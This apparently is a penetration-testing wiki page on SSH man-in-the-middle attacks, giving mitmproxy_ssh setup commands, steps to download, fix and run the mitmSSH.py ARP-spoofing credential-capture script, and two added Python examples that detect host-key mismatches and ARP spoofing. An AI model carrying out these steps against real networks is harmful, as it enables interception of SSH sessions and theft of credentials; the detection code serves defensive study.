==SSH MITM with mitmproxy_ssh==

Source: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/

 # Download mitmproxy
 git clone https://github.com/mitmproxy/mitmproxy.git

 # Generate mitm keys (these go to ~/.mitmkeys)
 ./mitmkeys

Now you want to install the SSH key you just generated on the server you want to MITM.

 # Install SSH key
 ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver

Then run the proxy, pointing it at victimserver.

 # Run proxy
 ./mitmproxy_ssh -H victimserver

This runs the proxy on localhost:2222.

Now simply connect to the local proxy:

 ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window where you ran mitmproxy_ssh.

==Automating man-in-the-middle SSHv2 attacks==

Source: https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/

Recently during an internal penetration test, I was performing ARP spoofing and I discovered an SSH connection from the administrator computer to another box.

That sounds like the correct way to access remote hosts securely. However, the problem was that the company was using a network switch that was vulnerable to ARP spoofing.

I came across the below article about performing ARP spoofing and MITM on SSH connections to steal credentials.

When performing ARP spoofing and a MITM attack on SSH, the victim does get an alert message saying that there is a key mismatch, but most people just ignore them anyway.

Below is the link to the original article.

http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/

In the article, the author demonstrates the use of a piece of software called JMITM2 (http://www.david-guembel.de/index.php?id=6), which is sort of like a honeypot that proxies SSH connections between the victim and the target SSH server.

However, there are a number of steps to be done manually to execute this attack during an internal penetration test.

# Check if the network is vulnerable to ARP spoofing
# Check if there are any active SSH connections in the network
# Identify the victim computer and SSH server
# Modify the configuration files of JMITM2
# Modify iptables
# ARP spoofing
# Check the JMITM2 console for credentials
# Re-ARP the router and victim host with the correct MAC addresses of each.

It would save a great amount of time to automate these steps. I wrote a script that does just that.

Running the command below checks the network for active SSH connections (via ARP spoofing) and then automates the whole attack, outputting any credentials captured to the console.

 python2.7 mitmSSH.py -analyze

If you know the victim host IP and SSH server, you can use the below command.

 python2.7 mitmSSH.py -host victims -ssh sshServerIP

(screenshot: IMG_2025.PNG)

This script has only been tested on Kali Linux.

There are a couple of things that are still in the works to improve the script.

1. Switching from intercepter-ng for ARP spoofing to scapy.

The script can be grabbed from the below link:

https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py

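Both procedures on this page stand or fall on one client-side check: mitmproxy_ssh, like JMITM2 in the article just cited, presents its own host key, so the victim's SSH client compares it against known_hosts and warns about a key mismatch that the victim then has to ignore. The script below is an added example, not code from either source or from mitmSSH.py, that reproduces that check offline with the Python standard library. The ed25519 key bytes, the hostname victimserver, the address 192.0.2.10 and the known_hosts contents are all constructed for the example; it computes the OpenSSH-style SHA256 fingerprint of a key line, matches plain, comma-separated and hashed (|1|salt|digest) host fields, and reports ok, unknown or MISMATCH the way a client does.

```python
"""Reproduce the SSH client's host-key check against known_hosts.

Added example, not code from the pages cited above. It uses only the Python
standard library; the key material and known_hosts content are constructed
for the example and belong to no real host.
"""
import base64
import hashlib
import hmac
import struct


def ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire-format string: uint32 length, then payload."""
    return struct.pack(">I", len(data)) + data


def make_ed25519_pubkey_line(raw32: bytes) -> str:
    """Build an 'ssh-ed25519 AAAA...' line from 32 raw key bytes (constructed, not a real key)."""
    if len(raw32) != 32:
        raise ValueError("ed25519 public keys are 32 bytes")
    blob = ssh_string(b"ssh-ed25519") + ssh_string(raw32)
    return "ssh-ed25519 " + base64.b64encode(blob).decode()


def fingerprint(pubkey_line: str) -> str:
    """OpenSSH-style fingerprint: SHA256 over the key blob, base64 with padding stripped."""
    blob = base64.b64decode(pubkey_line.split()[1])
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def hash_hostname(hostname: str, salt: bytes) -> str:
    """Hashed known_hosts host field: |1|base64(salt)|base64(HMAC-SHA1(salt, hostname))."""
    mac = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(mac).decode())


def hostname_matches(host_field: str, hostname: str) -> bool:
    """Match a known_hosts host field (plain, comma-separated, or hashed) against a hostname."""
    if host_field.startswith("|1|"):
        salt_b64 = host_field.split("|")[2]
        return hash_hostname(hostname, base64.b64decode(salt_b64)) == host_field
    return hostname in host_field.split(",")


def check_host_key(known_hosts: str, hostname: str, offered_key: str) -> str:
    """Return 'ok', 'unknown' or 'MISMATCH' for the key a server (or a MITM proxy) offers.

    'MISMATCH' is the warning the victim has to click through for the attack to work.
    """
    offered_type, offered_b64 = offered_key.split()[:2]
    result = "unknown"
    for line in known_hosts.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host_field, key_type, key_b64 = line.split()[:3]
        if not hostname_matches(host_field, hostname) or key_type != offered_type:
            continue
        if key_b64 == offered_b64:
            return "ok"
        result = "MISMATCH"  # same host, same key type, different key
    return result


# Constructed material: the real server's key and the key a MITM proxy would present.
SERVER_KEY = make_ed25519_pubkey_line(bytes(range(32)))
PROXY_KEY = make_ed25519_pubkey_line(bytes(range(32, 64)))
SALT = b"0123456789abcdefghij"  # 20 constructed salt bytes
KNOWN_HOSTS = "\n".join([
    "# constructed known_hosts for the example",
    "victimserver,192.0.2.10 " + SERVER_KEY,
    hash_hostname("hashed.example", SALT) + " " + SERVER_KEY,
])

if __name__ == "__main__":
    print("server fingerprint:", fingerprint(SERVER_KEY))
    print("proxy  fingerprint:", fingerprint(PROXY_KEY))
    for host, key in [("victimserver", SERVER_KEY), ("victimserver", PROXY_KEY),
                      ("hashed.example", SERVER_KEY), ("other.example", PROXY_KEY)]:
        print(host, check_host_key(KNOWN_HOSTS, host, key))
```

The practical point for a defender is the MISMATCH branch: with StrictHostKeyChecking set to yes and a pinned known_hosts entry the client refuses the connection outright instead of asking, and the fingerprint printed by the script is the value an administrator should confirm out of band rather than accept from the warning prompt.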
|
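The footprint this attack leaves on the wire is the ARP traffic from step 6 of the manual procedure (the spoofed replies that point the victim and the router at the attacker) and from step 8 (re-ARPing both with their real MAC addresses when the tester is done). The following Python is an added example, not part of the original post or of mitmSSH.py, that runs the corresponding detection over constructed tcpdump-style ARP reply lines: the 192.0.2.x addresses and all MAC addresses are made up, with 192.0.2.1 as the gateway, 192.0.2.50 as the victim and de:ad:be:ef:00:99 as the attacker. It flags an IP whose MAC changes and a single MAC that claims both the gateway and another host, which is exactly what the script does to the victim and the router.

```python
"""Spot ARP spoofing from ARP reply traffic.

Added example, not code from the post or from mitmSSH.py. Input is
tcpdump-style "ARP, Reply <ip> is-at <mac>" lines; the sample below is
constructed (192.0.2.x addresses, made-up MACs) to replay the attack:
the attacker re-points the gateway and the victim at its own MAC, then
re-ARPs both with their real MACs when done. Standard library only.
"""
import re
from collections import defaultdict, namedtuple

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"is-at (?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})"
)

Alert = namedtuple("Alert", "ts kind ip mac detail")


def parse_arp_replies(lines):
    """Yield (timestamp, ip, mac) for each ARP reply; requests and other lines are skipped."""
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mac").lower()


def detect_arp_spoofing(lines, gateway_ip):
    """Return Alerts for the two footprints an ARP MITM leaves.

    mac_change: an IP that was seen with one MAC is now claimed by another
      (fires both when the attack starts and when the attacker re-ARPs).
    gateway_impersonation: one MAC claims the gateway IP and at least one
      other host, reported once per MAC. A router that legitimately owns
      several addresses also triggers this, so treat it as a lead, not proof.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    reported_macs = set()
    alerts = []
    for ts, ip, mac in parse_arp_replies(lines):
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append(Alert(ts, "mac_change", ip, mac, "previously %s" % prev))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        others = mac_to_ips[mac] - {gateway_ip}
        if gateway_ip in mac_to_ips[mac] and others and mac not in reported_macs:
            reported_macs.add(mac)
            alerts.append(Alert(ts, "gateway_impersonation", gateway_ip, mac,
                                "also claims %s" % ", ".join(sorted(others))))
    return alerts


# Constructed capture in tcpdump -n style. 192.0.2.1 is the gateway, .50 the
# victim, de:ad:be:ef:00:99 the attacker. Not from a real network.
SAMPLE_CAPTURE = """\
10:00:00.000000 ARP, Request who-has 192.0.2.1 tell 192.0.2.50, length 28
10:00:00.000100 ARP, Reply 192.0.2.1 is-at 00:11:22:33:44:01, length 46
10:00:05.000000 ARP, Reply 192.0.2.50 is-at 00:11:22:33:44:50, length 46
10:01:00.000000 ARP, Reply 192.0.2.1 is-at de:ad:be:ef:00:99, length 46
10:01:00.000050 ARP, Reply 192.0.2.50 is-at de:ad:be:ef:00:99, length 46
10:01:02.000000 ARP, Reply 192.0.2.1 is-at de:ad:be:ef:00:99, length 46
10:05:00.000000 ARP, Reply 192.0.2.1 is-at 00:11:22:33:44:01, length 46
10:05:00.000050 ARP, Reply 192.0.2.50 is-at 00:11:22:33:44:50, length 46
"""

if __name__ == "__main__":
    for a in detect_arp_spoofing(SAMPLE_CAPTURE.splitlines(), "192.0.2.1"):
        print(a.ts, a.kind, a.ip, a.mac, a.detail)
```

On the constructed capture the detector raises five alerts: two MAC changes when the attacker takes over the gateway and victim entries, one gateway impersonation as soon as the same MAC holds both, and two more MAC changes at the end, which is the re-ARP from step 8 restoring the real addresses. Fed a live tcpdump -n -l arp stream instead of the sample, the same logic is a cheap alarm for the attack this page automates.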
==Download==

 wget https://raw.githubusercontent.com/milo2012/pentest_automation/master/mitmSSH.py

 mkdir /tmp/tools
 cd /tmp/tools
 wget https://github.com/intercepter-ng/mirror/archive/master.zip
 unzip master.zip
 mv /tmp/tools/mirror-master/* /tmp/tools/
 unzip Intercepter-NG.CE.05.zip

==Edit source==

Two lines of mitmSSH.py have to be fixed before the script will run:

* line 1: rom > from (the first import statement is missing the leading letter of the from keyword)
* the line currentPath="/tmp1/tools" > currentPath="/tmp/tools" (so that the script looks for Intercepter-NG in the directory it was unpacked into above)

Then make sure the directory the script expects exists:

 mkdir /tmp/tools

==References==

* https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/
* https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/
* https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py
* http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/